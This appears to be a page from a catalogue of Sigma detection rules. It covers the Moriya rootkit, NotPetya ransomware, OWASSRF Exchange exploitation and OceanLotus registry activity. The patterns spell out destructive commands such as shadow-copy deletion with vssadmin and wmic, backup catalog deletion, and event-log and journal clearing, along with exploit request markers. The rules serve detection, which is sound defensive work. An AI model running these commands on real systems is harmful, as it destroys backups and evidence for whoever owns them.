- 'DisableRestrictedAdmin'
- 'CurrentControlSet\Control\Lsa'
selection_child_wmic_1:
CommandLine|contains|all:
- 'wmic'
- 'process call create'
selection_child_wmic_2:
CommandLine|contains|all:
- 'wmic'
- 'delete'
- 'shadowcopy'
selection_child_vssadmin:
CommandLine|contains|all:
- 'vssadmin'
- 'delete'
- 'shadows'
selection_child_wbadmin:
CommandLine|contains|all:
- 'wbadmin'
- 'delete'
- 'catalog'
filter_main:
CommandLine|contains|all:
- 'download.microsoft.com'
- 'manageengine.com'
- 'msiexec'
condition: all of selection_parent_* and (all of selection_special_child_powershell_* or all of selection_special_child_lsass_* or 1 of selection_child_*) and not filter_main
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
Moriya Rootkit - System
Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
view Sigma YAML
title: Moriya Rootkit - System
id: 25b9c01c-350d-4b95-bed1-836d04a4f324
status: test
description: Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report
references:
- https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2022-11-29
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1543.003
logsource:
product: windows
service: system
detection:
selection:
Provider_Name: 'Service Control Manager'
EventID: 7045
ServiceName: ZzNetSvc
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
Moriya Rootkit File Created
Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
view Sigma YAML
title: Moriya Rootkit File Created
id: a1507d71-0b60-44f6-b17c-bf53220fdd88
related:
- id: 25b9c01c-350d-4b95-bed1-836d04a4f324
type: derived
status: test
description: Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report.
references:
- https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
author: Bhabesh Raj
date: 2021-05-06
modified: 2023-05-05
tags:
- attack.persistence
- attack.privilege-escalation
- attack.t1543.003
- detection.emerging-threats
logsource:
product: windows
category: file_event
detection:
selection:
TargetFilename: 'C:\Windows\System32\drivers\MoriyaStreamWatchmen.sys'
condition: selection
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
NotPetya Ransomware Activity
Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
view Sigma YAML
title: NotPetya Ransomware Activity
id: 79aeeb41-8156-4fac-a0cd-076495ab82a1
status: test
description: Detects NotPetya ransomware activity in which the extracted passwords are passed back to the main module via named pipe, the file system journal of drive C is deleted and Windows eventlogs are cleared using wevtutil
references:
- https://securelist.com/schroedingers-petya/78870/
- https://www.hybrid-analysis.com/sample/64b0b58a2c030c77fdb2b537b2fcc4af432bc55ffb36599a31d418c7c69e94b1?environmentId=100
author: Florian Roth (Nextron Systems), Tom Ueltschi
date: 2019-01-16
modified: 2022-12-15
tags:
- attack.stealth
- attack.defense-impairment
- attack.t1218.011
- attack.t1685.005
- attack.credential-access
- attack.t1003.001
- car.2016-04-002
- detection.emerging-threats
logsource:
category: process_creation
product: windows
detection:
selection_specific_pattern:
CommandLine|contains:
- 'wevtutil cl Application & fsutil usn deletejournal /D C:'
- 'dllhost.dat %WINDIR%\ransoms'
selection_rundll32:
Image|endswith: '\rundll32.exe'
CommandLine|endswith:
- '.dat,#1'
- '.dat #1' # Sysmon removes comma
- '.zip.dll",#1'
selection_perfc_keyword:
- '\perfc.dat'
condition: 1 of selection_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
critical
OWASSRF Exploitation Attempt Using Public POC - Proxy
Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
view Sigma YAML
title: OWASSRF Exploitation Attempt Using Public POC - Proxy
id: fdd7e904-7304-4616-a46a-e32f917c4be4
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
- https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
- https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
- https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
tags:
- attack.initial-access
- attack.t1190
- detection.emerging-threats
logsource:
category: proxy
detection:
selection:
# Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
c-useragent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
cs-method: 'POST'
sc-status: 200
c-uri|contains|all:
- '/owa/mastermailbox'
- '/powershell'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
OWASSRF Exploitation Attempt Using Public POC - Webserver
Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
view Sigma YAML
title: OWASSRF Exploitation Attempt Using Public POC - Webserver
id: 92d78c63-5a5c-4c40-9b60-463810ffb082
status: test
description: Detects exploitation attempt of the OWASSRF variant targeting exchange servers using publicly available POC. It uses the OWA endpoint to access the powershell backend endpoint
references:
- https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/
- https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
- https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
author: Nasreddine Bencherchali (Nextron Systems)
date: 2022-12-22
modified: 2023-01-02
tags:
- attack.initial-access
- attack.t1190
- detection.emerging-threats
logsource:
category: webserver
detection:
selection:
# Look for the header: X-OWA-ExplicitLogonUser: owa/[email protected]
cs-user-agent: 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36'
cs-method: 'POST'
sc-status: 200
cs-uri-query|contains|all:
- '/owa/mastermailbox'
- '/powershell'
condition: selection
falsepositives:
- Unlikely
level: critical
Convert to SIEM query
critical
OceanLotus Registry Activity
Detects registry keys created in OceanLotus (also known as APT32) attacks
view Sigma YAML
title: OceanLotus Registry Activity
id: 4ac5fc44-a601-4c06-955b-309df8c4e9d4
status: test
description: Detects registry keys created in OceanLotus (also known as APT32) attacks
references:
- https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/
- https://github.com/eset/malware-ioc/tree/master/oceanlotus
author: megan201296, Jonhnathan Ribeiro
date: 2019-04-14
modified: 2023-09-28
tags:
- attack.persistence
- attack.defense-impairment
- attack.t1112
- detection.emerging-threats
logsource:
category: registry_event
product: windows
detection:
selection_clsid:
TargetObject|contains: '\SOFTWARE\Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
selection_hkcu:
TargetObject|contains:
# HKCU\SOFTWARE\Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\
- 'Classes\AppXc52346ec40fb4061ad96be0e6cb7d16a\'
# HKCU\SOFTWARE\Classes\AppX3bbba44c6cae4d9695755183472171e2\
- 'Classes\AppX3bbba44c6cae4d9695755183472171e2\'
# HKCU\SOFTWARE\Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\
- 'Classes\CLSID\{E3517E26-8E93-458D-A6DF-8030BC80528B}\'
- 'Classes\CLSID\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\Model'
selection_appx_1:
TargetObject|contains: '\SOFTWARE\App\'
selection_appx_2:
TargetObject|contains:
- 'AppXbf13d4ea2945444d8b13e2121cb6b663\'
- 'AppX70162486c7554f7f80f481985d67586d\'
- 'AppX37cc7fdccd644b4f85f4b22d5a3f105a\'
TargetObject|endswith:
- 'Application'
- 'DefaultIcon'
condition: selection_clsid or selection_hkcu or all of selection_appx_*
falsepositives:
- Unknown
level: critical
Convert to SIEM query
Showing 51-100 of 3,750